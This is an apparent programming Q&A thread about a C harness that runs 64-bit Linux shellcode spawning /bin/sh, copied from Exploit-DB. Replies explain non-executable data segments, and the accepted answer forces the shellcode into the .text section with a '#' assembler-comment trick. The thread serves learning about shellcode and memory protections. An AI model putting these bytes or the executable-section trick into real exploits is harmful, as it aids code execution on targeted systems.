# Shellcode to execute a shell results in a segmentation fault

Tags: c, shellcode

I am trying to run this code to get a shell but I am getting a segmentation fault even with ASLR disabled. I am running this code on my AMD Ryzen 3 computer with Ubuntu 20.04 64bit version.

I am compiling with the following command:

```plaintext
$ gcc -O0 -fno-stack-protector -z execstack getshell.c -o getshell
```

File getshell.c is as following:

```
#include <stdio.h>

unsigned char shellcode[] = \
"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05";
int main()
{
    int (*ret)() = (int(*)())shellcode;
    ret();
}
```

Edit: I found this piece of code [here](https://www.exploit-db.com/exploits/46907)

Comment: The contents of the `shellcode` array is not on the stack. It's in the data-segment, which is by default not-executable.

Comment: data will not have execytable permitions. You need to set it

Comment: @Someprogrammerdude it will place it in the .rodata segment which will not be executable as well.

Comment: try `unsigned char  __attribute__((section(".text"))) shellcode[]`

Comment: ```unsigned char  __attribute__((section(".text")))``` worked! Thank you so much @0________!

Comment: @TaimoorZaeem Please include the source of the program; or if you have written it yourself; I found an **`exact copy of the code on ExploitDB`** https://www.exploit-db.com/exploits/46907

Comment: @WilliamMartens Yes, that is exactly where I found it, I didn't write it myself.

Comment: @TaimoorZaeem okay! thanks for confirming! we can better help the future by including links used :)  - can you include the link in the question; even if it is solved? for future problems it will help :)

Comment: @TaimoorZaeem **AWESOME**! Have a great day and good luck! shell coding indeed is fascinating !

Comment: @WilliamMartens Same to you!

Answer (score 7, accepted):

`unsigned char  __attribute__((section(".text#"))) shellcode[]`

works for me (mind the `#`)

`#` is a trick - it comments part of the emitted assembly code by gcc.

Comment: this is one brilliant piece of answer; did you make this yourself or is there any further readings? thanks! (Just requesting that for me myself, not any critic or feedback really, since the answer is completely flawless)